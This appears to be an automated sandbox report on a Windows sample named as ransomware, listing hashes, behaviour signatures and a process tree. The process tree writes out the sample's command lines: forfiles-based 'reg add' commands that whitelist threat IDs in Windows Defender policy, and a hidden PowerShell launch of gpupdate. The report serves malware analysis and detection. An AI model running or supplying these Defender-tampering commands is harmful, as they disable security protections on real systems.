Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19/08/2024, 19:30
Static task
static1
Behavioral task
behavioral1
Sample
20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe
Resource
win10v2004-20240802-en
General
-
Target
20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe
-
Size
6.7MB
-
MD5
a042363697a1223f9e939f0d45af42db
-
SHA1
f3ad51b38082225ff2b2c7de7afde74c98bff442
-
SHA256
0a88441599708e6db61bb9d31e8701ac08b17a69f1d46361385f700b090718f4
-
SHA512
656fe7f529fe5b3dec510194c17fe687afc8b880341e917ef5f19533d721b03175dcbcea69703a343bcc5869af6329a2686d473f94d5e3189b36fb0d0bfcb900
-
SSDEEP
98304:XNnN9K9kEk9khQzw+1mAMw5svqBNtb7yCJCva2JTV40IOMy:X79V9jzw+1mAMw6vqRb7yuixrIU
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2808 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation 20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe -
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 8 forfiles.exe 4920 forfiles.exe 2976 forfiles.exe 4796 forfiles.exe 1868 forfiles.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2716 2528 WerFault.exe 85 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2808 powershell.exe 2808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2808 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2528 wrote to memory of 956 2528 20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe 88 PID 2528 wrote to memory of 956 2528 20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe 88 PID 2528 wrote to memory of 956 2528 20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe 88 PID 956 wrote to memory of 1868 956 cmd.exe 90 PID 956 wrote to memory of 1868 956 cmd.exe 90 PID 956 wrote to memory of 1868 956 cmd.exe 90 PID 1868 wrote to memory of 972 1868 forfiles.exe 92 PID 1868 wrote to memory of 972 1868 forfiles.exe 92 PID 1868 wrote to memory of 972 1868 forfiles.exe 92 PID 972 wrote to memory of 1356 972 cmd.exe 93 PID 972 wrote to memory of 1356 972 cmd.exe 93 PID 972 wrote to memory of 1356 972 cmd.exe 93 PID 956 wrote to memory of 8 956 cmd.exe 94 PID 956 wrote to memory of 8 956 cmd.exe 94 PID 956 wrote to memory of 8 956 cmd.exe 94 PID 8 wrote to memory of 1524 8 forfiles.exe 95 PID 8 wrote to memory of 1524 8 forfiles.exe 95 PID 8 wrote to memory of 1524 8 forfiles.exe 95 PID 1524 wrote to memory of 2340 1524 cmd.exe 96 PID 1524 wrote to memory of 2340 1524 cmd.exe 96 PID 1524 wrote to memory of 2340 1524 cmd.exe 96 PID 956 wrote to memory of 4920 956 cmd.exe 97 PID 956 wrote to memory of 4920 956 cmd.exe 97 PID 956 wrote to memory of 4920 956 cmd.exe 97 PID 4920 wrote to memory of 3440 4920 forfiles.exe 98 PID 4920 wrote to memory of 3440 4920 forfiles.exe 98 PID 4920 wrote to memory of 3440 4920 forfiles.exe 98 PID 3440 wrote to memory of 5092 3440 cmd.exe 99 PID 3440 wrote to memory of 5092 3440 cmd.exe 99 PID 3440 wrote to memory of 5092 3440 cmd.exe 99 PID 956 wrote to memory of 2976 956 cmd.exe 100 PID 956 wrote to memory of 2976 956 cmd.exe 100 PID 956 wrote to memory of 2976 956 cmd.exe 100 PID 2976 wrote to memory of 3312 2976 forfiles.exe 101 PID 2976 wrote to memory of 3312 2976 forfiles.exe 101 PID 2976 wrote to memory of 3312 2976 forfiles.exe 101 PID 3312 wrote to memory of 2272 3312 cmd.exe 102 PID 3312 wrote to memory of 2272 3312 cmd.exe 102 PID 3312 wrote to memory of 2272 3312 cmd.exe 102 PID 956 wrote to memory of 4796 956 cmd.exe 103 PID 956 wrote to memory of 4796 956 cmd.exe 103 PID 956 wrote to memory of 4796 956 cmd.exe 103 PID 4796 wrote to memory of 1812 4796 forfiles.exe 104 PID 4796 wrote to memory of 1812 4796 forfiles.exe 104 PID 4796 wrote to memory of 1812 4796 forfiles.exe 104 PID 1812 wrote to memory of 2808 1812 cmd.exe 105 PID 1812 wrote to memory of 2808 1812 cmd.exe 105 PID 1812 wrote to memory of 2808 1812 cmd.exe 105 PID 2808 wrote to memory of 2532 2808 powershell.exe 106 PID 2808 wrote to memory of 2532 2808 powershell.exe 106 PID 2808 wrote to memory of 2532 2808 powershell.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe"C:\Users\Admin\AppData\Local\Temp\20240819a042363697a1223f9e939f0d45af42dbbkransomware.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:972 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1356
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1524 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3440 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3312 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2272
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:2532
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 6242⤵
- Program crash
PID:2716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 25281⤵PID:3284
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82